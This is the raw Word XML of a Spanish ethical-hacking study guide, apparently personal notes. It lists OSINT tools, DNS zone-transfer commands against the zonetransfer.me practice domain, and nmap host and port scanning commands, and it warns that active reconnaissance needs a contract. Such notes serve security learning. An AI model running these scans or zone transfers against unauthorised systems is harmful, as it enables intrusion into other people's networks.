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4F5EBF" w14:textId="7B65D639" w:rsidR="00983310" w:rsidRPr="00AA2266" w:rsidRDefault="009B628E" w:rsidP="007F5306">
      <w:pPr>
        <w:ind w:left="3540" w:hanging="3540"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:outline/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="9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AA2266">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:outline/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="9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Guía Hacking Ético</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420A9B30" w14:textId="2BF05482" w:rsidR="009B628E" w:rsidRDefault="009B628E"/>
    <w:p w14:paraId="3DE6D16C" w14:textId="727B663B" w:rsidR="009B628E" w:rsidRPr="00E961D1" w:rsidRDefault="009B628E" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E961D1">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Recopilación Pasiva:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7A3B58" w14:textId="60AC02C7" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Google Hacking:</w:t>
      </w:r>
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Información básica</w:t>
      </w:r>
      <w:r w:rsidR="003F71AC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6179E559" w14:textId="3CEDBC56" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>TheHarvester:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Recopila</w:t>
      </w:r>
      <w:r w:rsidR="003F71AC">
        <w:t>dor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de toda la información</w:t>
      </w:r>
      <w:r w:rsidR="003F71AC">
        <w:t xml:space="preserve"> en línea del domino elegido</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4497A8" w14:textId="51BD3CDC" w:rsidR="00383F39" w:rsidRDefault="00383F39" w:rsidP="009B628E">
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TheHarvester -d (dirección web) -b all</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  [o cualquier otro navegador]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2960EB21" w14:textId="4E424DB5" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Maltego:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Alternativa </w:t>
      </w:r>
      <w:r w:rsidR="003F71AC">
        <w:t xml:space="preserve">gráfica </w:t>
      </w:r>
      <w:r>
        <w:t>a TheHarvester</w:t>
      </w:r>
      <w:r w:rsidR="003F71AC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F280E56" w14:textId="1B8B68DB" w:rsidR="00383F39" w:rsidRDefault="003F71AC" w:rsidP="009B628E">
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="00383F39">
        <w:t xml:space="preserve"> distintos transformadores, que son los recursos para encontrar información</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263B5C8F" w14:textId="3004A76A" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>recon ng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Alternativa a </w:t>
      </w:r>
      <w:r w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Maltego</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y TheHarvester</w:t>
      </w:r>
      <w:r w:rsidR="00383F39">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714EB32A" w14:textId="23166889" w:rsidR="00383F39" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Shodan</w:t>
      </w:r>
      <w:r w:rsidR="00383F39">
        <w:t>: Sitio Web que nos permite indexar por puertos, servicios o hosts. Es principalmente de pago, aunque puede ser útil en determinadas ocasiones con la opción gratuita.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400D7DE9" w14:textId="15EF943B" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Censys: </w:t>
      </w:r>
      <w:r w:rsidR="00383F39">
        <w:t xml:space="preserve">Alternativa a </w:t>
      </w:r>
      <w:r w:rsidR="00383F39" w:rsidRPr="003F71AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>shodan.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A89F507" w14:textId="3989CAFC" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E"/>
    <w:p w14:paraId="763CFD49" w14:textId="00570D0F" w:rsidR="009B628E" w:rsidRPr="00E961D1" w:rsidRDefault="009B628E" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E961D1">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Recopilación Semi-Pasiva:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8513FC" w14:textId="49C8D957" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:r w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>La FOCA:</w:t>
      </w:r>
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00383F39">
        <w:t>Herramienta gráfica. Busca los metadatos de los ficheros. Capaz de encontrar información como usuario que creó el fichero, sistema operativo usado, programa y versión con el que se creó el fichero. Dirigido a documentos ofimáticos (doc, docx, odt, pdf…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A2C09" w14:textId="1D03662B" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DNSdumpster:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE6B3B">
        <w:t>Nos permite obtener de manera gráfica una visión general de la red (basado en el registro de zona, podemos conseguir ips, host, NameServers, etc…)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534751CE" w14:textId="721A30D6" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D07C3F" w14:textId="663B7C7D" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1323AE24" w14:textId="039D0DFE" w:rsidR="009B628E" w:rsidRPr="00A71201" w:rsidRDefault="009B628E" w:rsidP="00A71201">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A71201">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PELIGRO: NECESIDAD DE CONTRATO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BE12D4" w14:textId="5AE50723" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="009B628E"/>
    <w:p w14:paraId="1F4FA56E" w14:textId="135DCCC5" w:rsidR="009B628E" w:rsidRPr="00AE6B3B" w:rsidRDefault="009B628E" w:rsidP="00E961D1">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Recopilación Activa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10855A11" w14:textId="4A9EF883" w:rsidR="00E26D05" w:rsidRPr="00E56D03" w:rsidRDefault="00E26D05" w:rsidP="00E26D05">
      <w:pPr>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56D03">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Transferencias de zona (solo si no está bien configurado):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DFC5A5" w14:textId="3AB00FBC" w:rsidR="009B628E" w:rsidRDefault="009B628E" w:rsidP="00E26D05">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Nslookup (solo en Windows):</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Conseguiremos el fichero de zona</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F587937" w14:textId="30766C30" w:rsidR="00AE6B3B" w:rsidRPr="0097634F" w:rsidRDefault="00AE6B3B" w:rsidP="00E26D05">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE48C33" w14:textId="618E225F" w:rsidR="00AE6B3B" w:rsidRDefault="00AE6B3B" w:rsidP="00E26D05">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="0097634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Set type=ns</w:t>
      </w:r>
      <w:r w:rsidR="0097634F">
        <w:t xml:space="preserve"> (escogemos que nos devuelva solo los NameServers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C793AF" w14:textId="7450E969" w:rsidR="00AE6B3B" w:rsidRDefault="00AE6B3B" w:rsidP="00E26D05">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="0097634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>zonetrasnfer.me</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ejemplo de </w:t>
      </w:r>
      <w:r w:rsidR="0097634F">
        <w:t>sitio web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> del servidor al que vamos a atacar</w:t>
      </w:r>
      <w:r w:rsidR="0097634F">
        <w:t>, nos devolverá sus Nameservers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD2859E" w14:textId="2BD6469F" w:rsidR="0097634F" w:rsidRDefault="0097634F" w:rsidP="00E26D05">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="0097634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set type=any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ahora, ponemos any, porque ya queremos que nos lo devuelva todo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD2CA86" w14:textId="42BD040C" w:rsidR="0097634F" w:rsidRDefault="0097634F" w:rsidP="00E26D05">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="0097634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0097634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nsztm1.digi.ninja</w:t>
      </w:r>
      <w:r w:rsidRPr="0097634F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(NameServer al que vamos a atacar) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF8FFCD" w14:textId="69C79FDD" w:rsidR="00AE6B3B" w:rsidRDefault="0097634F" w:rsidP="004E3C19">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="0097634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ls -d zonetransfer.me</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (ejemplo de sitio web al que atacar, nos devolverá el fichero de zona)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01095AA2" w14:textId="77777777" w:rsidR="00E56D03" w:rsidRDefault="00EF0D89" w:rsidP="00E26D05">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DNSrecon (Linux):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6603CBD8" w14:textId="5E78BAF4" w:rsidR="00AE6B3B" w:rsidRDefault="00EF0D89" w:rsidP="004E3C19">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dnsrecon -d (dominio) -axfr</w:t>
      </w:r>
      <w:r w:rsidR="00E26D05" w:rsidRPr="00AE6B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A91641" w14:textId="77777777" w:rsidR="004E3C19" w:rsidRPr="00AE6B3B" w:rsidRDefault="004E3C19" w:rsidP="004E3C19">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49FC684F" w14:textId="5269E5F7" w:rsidR="004F1AFA" w:rsidRPr="00E56D03" w:rsidRDefault="004F1AFA" w:rsidP="004F1AFA">
      <w:pPr>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56D03">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NMAP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A81F81" w14:textId="17581A05" w:rsidR="004F1AFA" w:rsidRDefault="004F1AFA" w:rsidP="004F1AFA">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="003F01D2" w:rsidRPr="00260315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Descubrir host:</w:t>
      </w:r>
      <w:r w:rsidR="003F01D2" w:rsidRPr="00260315">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F01D2">
        <w:t>SIEMPRE USAR SUDO, es menos intrusivo y más eficaz ( sin permisos de root, solo comprueba si tiene algún servicio, no es muy fiable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29733C62" w14:textId="7D6536F2" w:rsidR="003F01D2" w:rsidRPr="003F01D2" w:rsidRDefault="003F01D2" w:rsidP="004F1AFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F01D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo nmap -sn (ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Host/ ip de la red</w:t>
      </w:r>
      <w:r w:rsidR="00704AFC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/dominio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410AF37C" w14:textId="279DC39A" w:rsidR="003F01D2" w:rsidRDefault="003F01D2" w:rsidP="004F1AFA">
      <w:r>
        <w:t xml:space="preserve"> La ip puede ser del dispositivo como por ejemplo 192.168.1.23 (comprueba si ese nodo en concreto está UP) o de la red, por ejemplo 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142561AB" w14:textId="5D74988B" w:rsidR="003F01D2" w:rsidRDefault="003F01D2" w:rsidP="004F1AFA">
      <w:r>
        <w:t>Si no aplicamos SUDO con la red, únicamente encuentra los dispositivos que responden a ping, con sudo, encuentra todos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0CF399" w14:textId="23B414BE" w:rsidR="003F01D2" w:rsidRPr="00260315" w:rsidRDefault="00260315" w:rsidP="004F1AFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="003F01D2" w:rsidRPr="00260315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>udo nmap -PS (ip host/ ip red)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / sudo nmap -PS (ip) -p (puerto) -&gt; comprueba un solo puerto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7163E6B2" w14:textId="699F420B" w:rsidR="003F01D2" w:rsidRDefault="003F01D2" w:rsidP="004F1AFA">
      <w:r>
        <w:t>Comprueba los puertos abiertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052BE136" w14:textId="77777777" w:rsidR="00B10CD3" w:rsidRDefault="00B10CD3" w:rsidP="004F1AFA"/>
    <w:p w14:paraId="2A65FA87" w14:textId="3349902E" w:rsidR="00B10CD3" w:rsidRPr="00B10CD3" w:rsidRDefault="00B10CD3" w:rsidP="004F1AFA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00B10CD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Descubrir puertos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D0689" w14:textId="4388383B" w:rsidR="00B10CD3" w:rsidRDefault="00B10CD3" w:rsidP="004F1AFA">
      <w:r>
        <w:t>Los estados de los puertos son:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE21363" w14:textId="2A882B92" w:rsidR="00B10CD3" w:rsidRDefault="00B10CD3" w:rsidP="00B10CD3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Abierto: La aplicación está corriendo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FC517C" w14:textId="21BB1D18" w:rsidR="00B10CD3" w:rsidRDefault="00B10CD3" w:rsidP="00B10CD3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cerrado: la aplicación no está corriendo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2257E54E" w14:textId="4C743DCB" w:rsidR="00B10CD3" w:rsidRDefault="00B10CD3" w:rsidP="00B10CD3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Filtrado: posiblemente haya un firewall por medio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22737016" w14:textId="24A33467" w:rsidR="00B10CD3" w:rsidRDefault="00B10CD3" w:rsidP="00B10CD3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unfiltred: Nmap no sabe si está filtrado o no</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7304B554" w14:textId="6D709034" w:rsidR="00D27E7D" w:rsidRPr="00D27E7D" w:rsidRDefault="00683A70" w:rsidP="00B10CD3">
      <w:r w:rsidRPr="00683A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sS (ip host) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">-p (puerto)  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:t>] -&gt; para analizar un puerto en concreto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13921997" w14:textId="5DA5ED23" w:rsidR="00D27E7D" w:rsidRPr="00D27E7D" w:rsidRDefault="00D27E7D" w:rsidP="00B10CD3">
      <w:r w:rsidRPr="00D27E7D">
        <w:t>si quiero hacerlo a varios host (un rango):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC1735" w14:textId="460C4375" w:rsidR="00D27E7D" w:rsidRDefault="00D27E7D" w:rsidP="00B10CD3">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -sS 192.168.24.1-10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:t>(ejemplo,buscaría en esas 10 direcciones IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A72282" w14:textId="2E34EEDC" w:rsidR="00D27E7D" w:rsidRDefault="00D27E7D" w:rsidP="00B10CD3">
      <w:r>
        <w:t>ANALISIS para presentar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBC39F9" w14:textId="251488E9" w:rsidR="00D27E7D" w:rsidRDefault="00D27E7D" w:rsidP="00B10CD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reason -sS -oX puerto.xml --stylesheet="https://svn.nmap.org/nmap/docs/nmap.xsl" (ip/rango/ip red)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD5194E" w14:textId="4D3883D3" w:rsidR="00383F39" w:rsidRDefault="00383F39" w:rsidP="00B10CD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C26223A" w14:textId="3908A003" w:rsidR="00383F39" w:rsidRPr="00383F39" w:rsidRDefault="00383F39" w:rsidP="00383F39">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IMPORTANTE: la opción -sS no termina el Threeway Handshake, por lo que algunos sistemas lo detectan como una amena</w:t>
      </w:r>
      <w:r w:rsidR="00D66F5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>z</w:t>
      </w:r>
      <w:r w:rsidRPr="00383F39">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a. Sin embargo, podemos usar la opción -sT, que sí termina el Threeway Handshake. Cierto, manda más paquetes a la red para terminarlo, pero paradójicamente es menos intrusivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1E4E9" w14:textId="78D4381F" w:rsidR="00383F39" w:rsidRDefault="00383F39" w:rsidP="00383F39">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D27E7D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nmap -v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
